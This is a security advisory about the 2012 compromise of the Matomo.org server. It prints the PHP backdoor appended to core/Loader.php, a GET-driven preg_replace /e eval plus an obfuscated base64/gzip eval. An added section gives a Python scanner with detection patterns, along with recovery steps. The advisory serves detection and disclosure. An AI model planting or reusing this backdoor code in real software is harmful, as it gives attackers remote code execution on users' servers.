Security Report: Matomo.org webserver hacked for a few hours on 2012 Nov 26th

Update 2014: since this event occurred almost two years ago, we have made numerous improvements and added layers of security to ensure it does not happen again:

Important Security Announcement: the Matomo.org webserver was compromised by an attacker on 2012 Nov 26th. For a few hours, this attacker added malicious code to the Matomo 1.9.2 Zip file.

How do I know if my Matomo server is safe?

You would be at risk only if you installed or updated to Matomo 1.9.2 on Nov 26th from 15:43 UTC to 23:59 UTC.
If you are not using 1.9.2, or if you have updated to 1.9.2 earlier than Nov 26th 15:40 UTC or from Nov 27th, you should be safe.

How do I double check if my Matomo server is affected?

To check if your Matomo is affected, open the file piwik/core/Loader.php. A clean file looks like this, whereas a compromised Loader.php contains the following code at the end of the file:

<?php Error_Reporting(0);
if(isset($_GET['g']) && isset($_GET['s'])) {
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');
    exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$

If you see this malicious code in your piwik/core/Loader.php file, read below to fix this issue.
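The manual check above can be automated. The following scanner is an added example, not part of the original Matomo announcement: it walks an install directory and flags any PHP file containing the three indicators visible in the compromised Loader.php excerpt (a preg_replace() call using the /e modifier fed from $_GET, an eval() over gzuncompress(base64_decode(...)), and the lic.log check). The sample file contents it scans are constructed for the demonstration, with the base64 payload replaced by a placeholder.

```python
"""Scan a Matomo/Piwik install tree for the Loader.php backdoor indicators."""
import os
import re
import sys
import tempfile

# Indicators derived from the compromised Loader.php excerpt in the report.
INDICATORS = {
    "preg_replace_e": re.compile(r"preg_replace\s*\(\s*[\"'][^\"']*/e[\"']\s*,\s*\$_GET"),
    "eval_gz_b64": re.compile(r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\("),
    "lic_log": re.compile(r"file_exists\s*\(.*lic\.log"),
}

# Constructed samples (not real files): a clean Loader.php and the same file with the
# backdoor appended, the base64 blob replaced by an obvious placeholder.
CLEAN_LOADER = "<?php\nclass Piwik_Loader {\n    public static function autoload($class) {}\n}\n"
COMPROMISED_LOADER = CLEAN_LOADER + (
    "<?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) {\n"
    "preg_replace(\"/(.+)/e\", $_GET['g'], 'dwm'); exit;\n}\n"
    "if (file_exists(dirname(__FILE__).\"/lic.log\")) exit;\n"
    "eval(gzuncompress(base64_decode('PLACEHOLDER_PAYLOAD')));\n"
)


def scan_php_source(source: str) -> list:
    """Return the names of every indicator found in one PHP file's contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def scan_install(root: str) -> dict:
    """Walk an install directory; map each flagged PHP file (relative path) to its indicators."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                found = scan_php_source(fh.read())
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits


def demo() -> dict:
    """Write the two constructed samples into a temporary piwik/ tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "core"))
        with open(os.path.join(root, "core", "Loader.php"), "w") as fh:
            fh.write(COMPROMISED_LOADER)
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(CLEAN_LOADER)
        return scan_install(root)


if __name__ == "__main__":
    # Pass the path to your piwik/ directory; without an argument the constructed demo runs.
    print(scan_install(sys.argv[1]) if len(sys.argv) > 1 else demo())
```

A non-empty result for core/Loader.php means the file should be treated as compromised and the recovery steps below followed; an empty result only says these particular indicators were not found.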

How do I fix my Matomo if it is compromised?
If your Matomo is compromised, follow these steps:

  1. Back up piwik/config/config.ini.php
  2. DELETE the piwik/ directory
    It is important to DELETE the directory and all piwik files, to ensure any malicious script is deleted as well.
  3. Download the latest Matomo from piwik.org
  4. Unzip and upload the piwik/ directory to your server
  5. Copy config.ini.php back into /piwik/config/
  6. Go to Matomo; it should display the dashboard as expected

You have now successfully restored Matomo to a clean version.

If you have other web software running in the same path on your server, we recommend, to be safe, restoring a backup of that other software as well.

How did the attacker get into piwik.org?

The attacker used a security issue in a WordPress plugin we were using, and gained partial access to the piwik.org server.

Is there a security bug in Matomo software itself?

The website Matomo.org is running WordPress and got compromised, because of a security issue in a WordPress plugin. As far as we know, the Matomo software does not have any exploitable security issue. We have a security bug bounty program in place that rewards researchers for finding security issues in Matomo software, and disclosing them to us. We also document here how you can make your own Matomo data safer and secure your server.

Has any sensitive data been leaked?

Matomo is self-hosted, open source software. Matomo.org does not track any web analytics data from any Matomo user. No personal or sensitive data has been leaked, since we do not track any.

What we are doing to prevent further issues

We are still working with our system administrators on the issue and have some ideas to make this kind of problem much less likely to occur. We will post a follow-up once these new mechanisms are in place.

Summary

We would like to thank the Matomo users who quickly reported this problem (by email and in the forums). We received more than five reports within a two-hour timeframe, which shows that the Matomo community is very vigilant and ready to react to any problem.

We are truly sorry for the inconvenience. Please be sure that we will do our best to keep Matomo (and Matomo.org) a safe place in the future.

Contact us at security@piwik.org if you need more info.
